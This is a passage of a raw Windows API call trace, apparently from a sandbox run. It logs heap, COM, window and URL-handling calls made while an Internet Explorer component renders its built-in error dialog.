[6]=0xc2, [7]=0xe6)), ppvObject=0x199c74 | out: ppvObject=0x199c74*=0x0) returned 0x80004002 [0159.125] IUnknown:QueryInterface (in: This=0x6bc880, riid=0x703b51f4*(Data1=0xf3d8f080, Data2=0xa5eb, Data3=0x476f, Data4=([0]=0x9d, [1]=0x19, [2]=0xa5, [3]=0xef, [4]=0x24, [5]=0xe5, [6]=0xc2, [7]=0xe6)), ppvObject=0x199c74 | out: ppvObject=0x199c74*=0x0) returned 0x80004002 [0159.125] IUnknown:QueryInterface (in: This=0xd5c0b0, riid=0x703b51f4*(Data1=0xf3d8f080, Data2=0xa5eb, Data3=0x476f, Data4=([0]=0x9d, [1]=0x19, [2]=0xa5, [3]=0xef, [4]=0x24, [5]=0xe5, [6]=0xc2, [7]=0xe6)), ppvObject=0x199c74 | out: ppvObject=0x199c74*=0x0) returned 0x80004002 [0159.125] IUnknown:Release (This=0x6caad0) returned 0x1 [0159.125] GetCurrentThreadId () returned 0xb48 [0159.125] GetCurrentThreadId () returned 0xb48 [0159.125] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x199a94 | out: lpCPInfo=0x199a94) returned 1 [0159.125] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="text/html", cchCount1=7, lpString2="charset", cchCount2=7) returned 3 [0159.125] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1006) returned 0x9ee4068 [0159.126] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1040) returned 0x9ee5078 [0159.126] memcpy_s (in: _Destination=0x9ee5084, _DestinationSize=0x1000, _Source=0x9ee205c, _SourceSize=0xcaf | out: _Destination=0x9ee5084) returned 0x0 [0159.126] memcpy_s (in: _Destination=0x9ee4068, _DestinationSize=0x1000, _Source=0x9ee5084, _SourceSize=0xcaf | out: _Destination=0x9ee4068) returned 0x0 [0159.126] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2000) returned 0x9ee60c0 [0159.128] GetCurrentThreadId () returned 0xb48 [0159.128] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.128] _ltow_s (in: _Value=3, _Buffer=0x198870, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0159.128] _ltow_s (in: _Value=3, _Buffer=0x198870, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0159.128] _ltow_s (in: _Value=3, _Buffer=0x198870, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0159.128] _ltow_s (in: _Value=3, _Buffer=0x198870, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0159.128] _ltow_s (in: _Value=3, _Buffer=0x198870, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0159.129] _ltow_s (in: _Value=3, _Buffer=0x198870, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0159.129] _ltow_s (in: _Value=3, _Buffer=0x198870, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0159.129] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee60c0 | out: hHeap=0x5e0000) returned 1 [0159.129] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee4068 | out: hHeap=0x5e0000) returned 1 [0159.129] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.130] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.130] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.130] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.130] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.130] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.131] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.131] GetCurrentThreadId () returned 0xb48 [0159.131] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.131] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.132] IUnknown:AddRef (This=0x5fc930) returned 0x7 [0159.132] IUnknown:AddRef (This=0x68e73c) returned 0x18 [0159.132] IUnknown:QueryInterface (in: This=0x68e73c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1999c0 | out: ppvObject=0x1999c0*=0x68e73c) returned 0x0 [0159.132] IUnknown:Release (This=0x68e73c) returned 0x18 [0159.133] IUnknown:AddRef (This=0x68e73c) returned 0x19 [0159.133] IUri:GetScheme (in: This=0x68e73c, pdwScheme=0x199a04 | out: pdwScheme=0x199a04*=0x12) returned 0x0 [0159.133] IUri:GetScheme (in: This=0x68e73c, pdwScheme=0x1999e4 | out: pdwScheme=0x1999e4*=0x12) returned 0x0 [0159.133] IUnknown:Release (This=0x5fc930) returned 0x6 [0159.133] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="text/html", cchCount1=7, lpString2="charset", cchCount2=7) returned 3 [0159.133] GetCurrentThreadId () returned 0xb48 [0159.133] SetEvent (hEvent=0x29c) returned 1 [0159.133] GetCurrentThreadId () returned 0xb48 [0159.134] IUnknown:Release (This=0x68e73c) returned 0x18 [0159.134] IUnknown:Release (This=0x68e1fc) returned 0x5 [0159.134] IUnknown:Release (This=0x613358) returned 0x4 [0159.134] IUnknown:Release (This=0x68e73c) returned 0x17 [0159.134] IUnknown:Release (This=0x68e73c) returned 0x16 [0159.134] IUnknown:Release (This=0x68e73c) returned 0x15 [0159.134] IUnknown:Release (This=0x613358) returned 0x3 [0159.134] IUnknown:Release (This=0x68e73c) returned 0x14 [0159.134] CoTaskMemFree (pv=0x6c8818) [0159.134] CoTaskMemFree (pv=0x0) [0159.134] IUnknown:Release (This=0x68e73c) returned 0x13 [0159.134] CoTaskMemFree (pv=0x612e98) [0159.135] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.135] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.135] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.135] IUnknown:Release (This=0x6d8128) returned 0x2 [0159.135] ActivateActCtx (in: hActCtx=0x600474, lpCookie=0x19a510 | out: hActCtx=0x600474, lpCookie=0x19a510) returned 1 [0159.135] GetSystemMetrics (nIndex=50) returned 16 [0159.135] GetSystemMetrics (nIndex=49) returned 16 [0159.136] LoadImageW (hInst=0x6d6d0000, name=0xa7b, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x1d0121 [0159.155] RegisterClassExW (param_1=0x19a420) returned 0xc241 [0159.156] AdjustWindowRectEx (in: lpRect=0x19a520, dwStyle=0x86c80000, bMenu=0, dwExStyle=0x1 | out: lpRect=0x19a520) returned 1 [0159.156] CreateWindowExW (dwExStyle=0x1, lpClassName=0xc241, lpWindowName="", dwStyle=0x86c80000, X=-8, Y=-31, nWidth=266, nHeight=139, hWndParent=0x70258, hMenu=0x0, hInstance=0x6d6d0000, lpParam=0xd36850) returned 0x103e0 [0159.157] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 0 [0159.157] SetWindowLongW (hWnd=0x103e0, nIndex=-21, dwNewLong=13854800) returned 0 [0159.158] NtdllDefWindowProc_W () returned 0x1 [0159.160] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.160] NtdllDefWindowProc_W () returned 0x0 [0159.162] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.162] GetSystemMenu (hWnd=0x103e0, bRevert=0) returned 0x1e039f [0159.165] RemoveMenu (hMenu=0x1e039f, uPosition=0xf020, uFlags=0x0) returned 1 [0159.165] RemoveMenu (hMenu=0x1e039f, uPosition=0xf030, uFlags=0x0) returned 1 [0159.166] RemoveMenu (hMenu=0x1e039f, uPosition=0xf000, uFlags=0x0) returned 1 [0159.166] RemoveMenu (hMenu=0x1e039f, uPosition=0xf120, uFlags=0x0) returned 1 [0159.166] NtdllDefWindowProc_W () returned 0x0 [0159.166] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.166] NtdllDefWindowProc_W () returned 0x0 [0159.167] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.167] NtdllDefWindowProc_W () returned 0x0 [0159.167] GetWindowLongW (hWnd=0x70258, nIndex=-16) returned -2033254400 [0159.167] GetWindowLongW (hWnd=0x70258, nIndex=-16) returned -2033254400 [0159.167] EnableWindow (hWnd=0x70258, bEnable=0) returned 0 [0159.167] NtdllDefWindowProc_W () returned 0x0 [0159.168] NtdllDefWindowProc_W () returned 0x0 [0159.168] GetClientRect (in: hWnd=0x103e0, lpRect=0xd3690c | out: lpRect=0xd3690c) returned 1 [0159.168] GetDC (hWnd=0x103e0) returned 0xb010541 [0159.168] GetTextMetricsW (in: hdc=0xb010541, lptm=0x19a540 | out: lptm=0x19a540) returned 1 [0159.168] ReleaseDC (hWnd=0x103e0, hDC=0xb010541) returned 1 [0159.168] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1de50004) returned 1 [0159.168] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0159.169] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0159.169] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0159.169] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 6297072 [0159.169] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103bc, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0159.169] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103bc, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0159.169] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103bc, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0159.169] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103bc, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0159.169] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103bc, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0159.170] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103bc, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0159.170] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103bc, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0159.170] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103bc, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0159.170] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103bc, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0159.170] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103bc, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0159.170] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103bc, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0159.170] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3097798907602) returned 1 [0159.170] NtdllDefWindowProc_W () returned 0x0 [0159.170] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0159.170] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0159.170] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0159.171] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0159.171] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0159.171] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0159.171] QueryPerformanceCounter (in: lpPerformanceCount=0x19a2c0 | out: lpPerformanceCount=0x19a2c0*=3097799028562) returned 1 [0159.172] SetEvent (hEvent=0x304) returned 1 [0159.172] QueryPerformanceCounter (in: lpPerformanceCount=0xd109e0 | out: lpPerformanceCount=0xd109e0*=3097799141868) returned 1 [0159.172] GetCurrentThreadId () returned 0xb48 [0159.173] GetCurrentThreadId () returned 0xb48 [0159.173] GetCurrentThreadId () returned 0xb48 [0159.175] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.175] LsSetDoc () returned 0x0 [0159.175] LsCreateLine () [0159.244] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.244] LsSetDoc () returned 0x0 [0159.244] LsCreateLine () [0159.245] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.247] ScreenToClient (in: hWnd=0x103ba, lpPoint=0x19a200 | out: lpPoint=0x19a200) returned 1 [0159.247] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.247] GetCurrentThreadId () returned 0xb48 [0159.247] GetCurrentThreadId () returned 0xb48 [0159.248] GetCurrentThreadId () returned 0xb48 [0159.248] GetFocus () returned 0x103ba [0159.249] GetCurrentThreadId () returned 0xb48 [0159.249] IsWinEventHookInstalled (event=0x8005) returned 0 [0159.249] GetCurrentThreadId () returned 0xb48 [0159.249] GetCurrentThreadId () returned 0xb48 [0159.250] CreateUri (in: pwzURI="res://ieframe.dll/error.dlg", dwFlags=0x3002b85, dwReserved=0x0, ppURI=0x198c70 | out: ppURI=0x198c70*=0x68e1fc) returned 0x0 [0159.250] IUnknown:QueryInterface (in: This=0x68e1fc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x198c4c | out: ppvObject=0x198c4c*=0x68e1fc) returned 0x0 [0159.251] IUnknown:Release (This=0x68e1fc) returned 0x6 [0159.251] IUnknown:AddRef (This=0x68e1fc) returned 0x7 [0159.251] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x38) returned 0x6c8558 [0159.251] IUnknown:Release (This=0x68e1fc) returned 0x6 [0159.251] IUnknown:Release (This=0x68e1fc) returned 0x5 [0159.251] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100) returned 0x6cb4a0 [0159.251] FindResourceExW (hModule=0x6d6d0000, lpType=0x6, lpName=0x1fe, wLanguage=0x0) returned 0x71d8a98 [0159.251] LoadResource (hModule=0x6d6d0000, hResInfo=0x71d8a98) returned 0x71ded10 [0159.251] LockResource (hResData=0x71ded10) returned 0x71ded10 [0159.251] VirtualQuery (in: lpAddress=0x71ded10, lpBuffer=0x199e24, dwLength=0x1c | out: lpBuffer=0x199e24*(BaseAddress=0x71de000, AllocationBase=0x6f40000, AllocationProtect=0x2, RegionSize=0x15d000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0159.252] SizeofResource (hModule=0x6d6d0000, hResInfo=0x71d8a98) returned 0x1be [0159.252] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6c8558 | out: hHeap=0x5e0000) returned 1 [0159.252] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6cb4a0, Size=0x56) returned 0x6cb4a0 [0159.252] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x5a) returned 0x5e24c0 [0159.252] IUnknown:AddRef (This=0x6caab0) returned 0x2 [0159.253] IUnknown:Release (This=0x6caab0) returned 0x1 [0159.253] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0159.254] GetProcAddress (hModule=0x703b0000, lpProcName="RevokeBindStatusCallback") returned 0x70413e20 [0159.254] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19a29c | out: lpflOldProtect=0x19a29c*=0x4) returned 1 [0159.255] RevokeBindStatusCallback (pBC=0x6d8128, pBSCb=0x6ca66c) returned 0x0 [0159.255] IUnknown:Release (This=0x6ca62c) returned 0x3 [0159.255] IUnknown:Release (This=0x6ca66c) returned 0x2 [0159.255] IUnknown:AddRef (This=0x6d8128) returned 0x3 [0159.255] IUnknown:Release (This=0x6d8128) returned 0x2 [0159.255] CoTaskMemFree (pv=0x6c87d8) [0159.255] IUnknown:Release (This=0x6d8128) returned 0x1 [0159.255] IUnknown:Release (This=0x6caab0) returned 0x0 [0159.255] IInternetProtocol:UnlockRequest (This=0xd5c0cc) returned 0x0 [0159.255] IUnknown:Release (This=0xd5c0cc) returned 0x1 [0159.256] IUnknown:Release (This=0x6bc880) returned 0x1 [0159.256] IUnknown:Release (This=0xd5c0b0) returned 0x0 [0159.256] GetProcessHeap () returned 0x5e0000 [0159.256] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ddfb8 | out: hHeap=0x5e0000) returned 1 [0159.256] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8e08 | out: hHeap=0x5e0000) returned 1 [0159.256] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b6598 | out: hHeap=0x5e0000) returned 1 [0159.256] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5be0 | out: hHeap=0x5e0000) returned 1 [0159.256] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db550 | out: hHeap=0x5e0000) returned 1 [0159.257] GetCurrentThreadId () returned 0xb48 [0159.257] SetEvent (hEvent=0x29c) returned 1 [0159.258] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.258] QueryPerformanceCounter (in: lpPerformanceCount=0x19a314 | out: lpPerformanceCount=0x19a314*=3097807719736) returned 1 [0159.258] QueryPerformanceCounter (in: lpPerformanceCount=0xd109e0 | out: lpPerformanceCount=0xd109e0*=3097807731564) returned 1 [0159.258] GetCurrentThreadId () returned 0xb48 [0159.258] GetCurrentThreadId () returned 0xb48 [0159.258] GetCurrentThreadId () returned 0xb48 [0159.258] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.259] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.280] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.280] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x7c) returned 0x68caf8 [0159.280] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68caf8 | out: hHeap=0x5e0000) returned 1 [0159.281] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.281] QueryPerformanceCounter (in: lpPerformanceCount=0x19a150 | out: lpPerformanceCount=0x19a150*=3097809998230) returned 1 [0159.281] QueryPerformanceCounter (in: lpPerformanceCount=0x19a258 | out: lpPerformanceCount=0x19a258*=3097810027487) returned 1 [0159.281] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0159.282] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x110) returned 0x6c5898 [0159.282] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9438 [0159.282] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d92b8 [0159.282] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9450 [0159.282] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9378 [0159.282] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9528 [0159.282] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.283] GetFocus () returned 0x103ba [0159.283] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x58) returned 0x6dda78 [0159.283] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.283] GetClientRect (in: hWnd=0x103ba, lpRect=0xcfc5d4 | out: lpRect=0xcfc5d4) returned 1 [0159.283] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.283] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.284] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.284] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.284] QueryPerformanceCounter (in: lpPerformanceCount=0x199dd8 | out: lpPerformanceCount=0x199dd8*=3097810312658) returned 1 [0159.284] GetDCEx (hWnd=0x103ba, hrgnClip=0x0, flags=0x12) returned 0xd010a58 [0159.284] CreateRectRgnIndirect (lprect=0x199d78) returned 0x86040a6c [0159.285] MapWindowPoints (in: hWndFrom=0x103ba, hWndTo=0x0, lpPoints=0x199db8, cPoints=0x1 | out: lpPoints=0x199db8) returned 3735586 [0159.285] GetRandomRgn (hdc=0xd010a58, hrgn=0x86040a6c, i=4) returned 1 [0159.285] OffsetRgn (hrgn=0x86040a6c, x=-34, y=-57) returned 1 [0159.285] MapWindowPoints (in: hWndFrom=0x103ba, hWndTo=0x0, lpPoints=0x199dc8, cPoints=0x1 | out: lpPoints=0x199dc8) returned 3735586 [0159.285] GetRegionData (in: hrgn=0x86040a6c, nCount=0x0, lpRgnData=0x0 | out: lpRgnData=0x0) returned 0x20 [0159.285] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6b5f00 [0159.285] GetRegionData (in: hrgn=0x86040a6c, nCount=0x20, lpRgnData=0x6b5f00 | out: lpRgnData=0x6b5f00) returned 0x20 [0159.285] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5f00 | out: hHeap=0x5e0000) returned 1 [0159.285] DeleteObject (ho=0x86040a6c) returned 1 [0159.285] ReleaseDC (hWnd=0x103ba, hDC=0xd010a58) returned 1 [0159.287] GetCurrentThreadId () returned 0xb48 [0159.287] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0159.287] QueryPerformanceCounter (in: lpPerformanceCount=0x19a2f0 | out: lpPerformanceCount=0x19a2f0*=3097810604316) returned 1 [0159.287] QueryPerformanceCounter (in: lpPerformanceCount=0x19a300 | out: lpPerformanceCount=0x19a300*=3097810611249) returned 1 [0159.287] KillTimer (hWnd=0x30316, uIDEvent=0x2002) returned 1 [0159.287] QueryPerformanceCounter (in: lpPerformanceCount=0x19a284 | out: lpPerformanceCount=0x19a284*=3097810630866) returned 1 [0159.287] QueryPerformanceCounter (in: lpPerformanceCount=0x19a270 | out: lpPerformanceCount=0x19a270*=3097810638451) returned 1 [0159.287] QueryPerformanceCounter (in: lpPerformanceCount=0x19a214 | out: lpPerformanceCount=0x19a214*=3097810648551) returned 1 [0159.289] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0159.289] IUnknown:AddRef (This=0x68e1fc) returned 0x6 [0159.289] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0159.289] IInternetSecurityManager:MapUrlToZone (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", pdwZone=0x19a140, dwFlags=0x0 | out: pdwZone=0x19a140*=0xffffffff) returned 0x800c0011 [0159.289] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.289] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.289] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0159.289] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x6cdf88, pUri=0x68e1fc, dwAction=0x1400, pPolicy=0x19a144, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0, pdwOutFlags=0x19a124 | out: pPolicy=0x19a144*=0x0, pdwOutFlags=0x19a124*=0x0) returned 0x0 [0159.289] IInternetSecurityManager:ProcessUrlAction (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", dwAction=0x1400, pPolicy=0x19a144, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x19a144*=0x0) returned 0x0 [0159.289] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.290] IUnknown:Release (This=0x6cdf88) returned 0x1 [0159.290] IUnknown:Release (This=0x68e1fc) returned 0x5 [0159.290] ParseURLW (in: pcszURL="res://ieframe.dll/error.dlg", ppu=0x19a194 | out: ppu=0x19a194) returned 0x0 [0159.290] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.290] StrChrW (lpStart="STYLE", wMatch=0x3a) returned 0x0 [0159.290] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.290] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.290] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.291] IsCharSpaceW (wch=0x66) returned 0 [0159.291] IsCharAlphaNumericW (ch=0x3a) returned 0 [0159.291] IsCharSpaceW (wch=0x3a) returned 0 [0159.291] IsCharAlphaNumericW (ch=0x3a) returned 0 [0159.292] IsCharSpaceW (wch=0x20) returned 1 [0159.292] IsCharSpaceW (wch=0x6d) returned 0 [0159.292] IsCharAlphaNumericW (ch=0x20) returned 0 [0159.292] IsCharSpaceW (wch=0x20) returned 1 [0159.292] IsCharSpaceW (wch=0x73) returned 0 [0159.292] IsCharAlphaNumericW (ch=0x20) returned 0 [0159.292] IsCharSpaceW (wch=0x20) returned 1 [0159.292] IsCharSpaceW (wch=0x73) returned 0 [0159.292] IsCharAlphaNumericW (ch=0x3b) returned 0 [0159.292] IsCharSpaceW (wch=0x3b) returned 0 [0159.292] IsCharAlphaNumericW (ch=0x3b) returned 0 [0159.292] IsCharSpaceW (wch=0x20) returned 1 [0159.292] IsCharSpaceW (wch=0x66) returned 0 [0159.292] IsCharSpaceW (wch=0x66) returned 0 [0159.292] IsCharSpaceW (wch=0x6d) returned 0 [0159.293] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x6b6018 [0159.293] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.293] IsCharAlphaNumericW (ch=0x3a) returned 0 [0159.293] IsCharSpaceW (wch=0x3a) returned 0 [0159.293] IsCharAlphaNumericW (ch=0x3a) returned 0 [0159.293] IsCharSpaceW (wch=0x20) returned 1 [0159.293] IsCharSpaceW (wch=0x38) returned 0 [0159.293] IsCharAlphaNumericW (ch=0x38) returned 1 [0159.293] IsCharAlphaNumericW (ch=0x3b) returned 0 [0159.293] IsCharSpaceW (wch=0x3b) returned 0 [0159.293] IsCharAlphaNumericW (ch=0x3b) returned 0 [0159.293] IsCharSpaceW (wch=0xd) returned 1 [0159.293] IsCharSpaceW (wch=0xa) returned 1 [0159.293] IsCharSpaceW (wch=0x77) returned 0 [0159.293] IsCharSpaceW (wch=0x74) returned 0 [0159.293] IsCharSpaceW (wch=0x38) returned 0 [0159.294] IsCharSpaceW (wch=0x38) returned 0 [0159.294] IsCharSpaceW (wch=0x74) returned 0 [0159.294] IsCharSpaceW (wch=0x38) returned 0 [0159.296] IsCharSpaceW (wch=0x70) returned 0 [0159.296] IsCharSpaceW (wch=0x74) returned 0 [0159.296] IsCharSpaceW (wch=0x0) returned 0 [0159.296] IsCharAlphaNumericW (ch=0x3a) returned 0 [0159.296] IsCharSpaceW (wch=0x3a) returned 0 [0159.296] IsCharAlphaNumericW (ch=0x3a) returned 0 [0159.296] IsCharSpaceW (wch=0x20) returned 1 [0159.296] IsCharSpaceW (wch=0x34) returned 0 [0159.296] IsCharAlphaNumericW (ch=0x34) returned 1 [0159.296] IsCharAlphaNumericW (ch=0x2e) returned 0 [0159.296] IsCharSpaceW (wch=0x2e) returned 0 [0159.296] IsCharAlphaNumericW (ch=0x2e) returned 0 [0159.296] IsCharAlphaNumericW (ch=0x34) returned 1 [0159.297] IsCharAlphaNumericW (ch=0x3b) returned 0 [0159.297] IsCharSpaceW (wch=0x3b) returned 0 [0159.297] IsCharAlphaNumericW (ch=0x3b) returned 0 [0159.297] IsCharSpaceW (wch=0x20) returned 1 [0159.297] IsCharSpaceW (wch=0x68) returned 0 [0159.297] IsCharSpaceW (wch=0x6d) returned 0 [0159.297] IsCharSpaceW (wch=0x34) 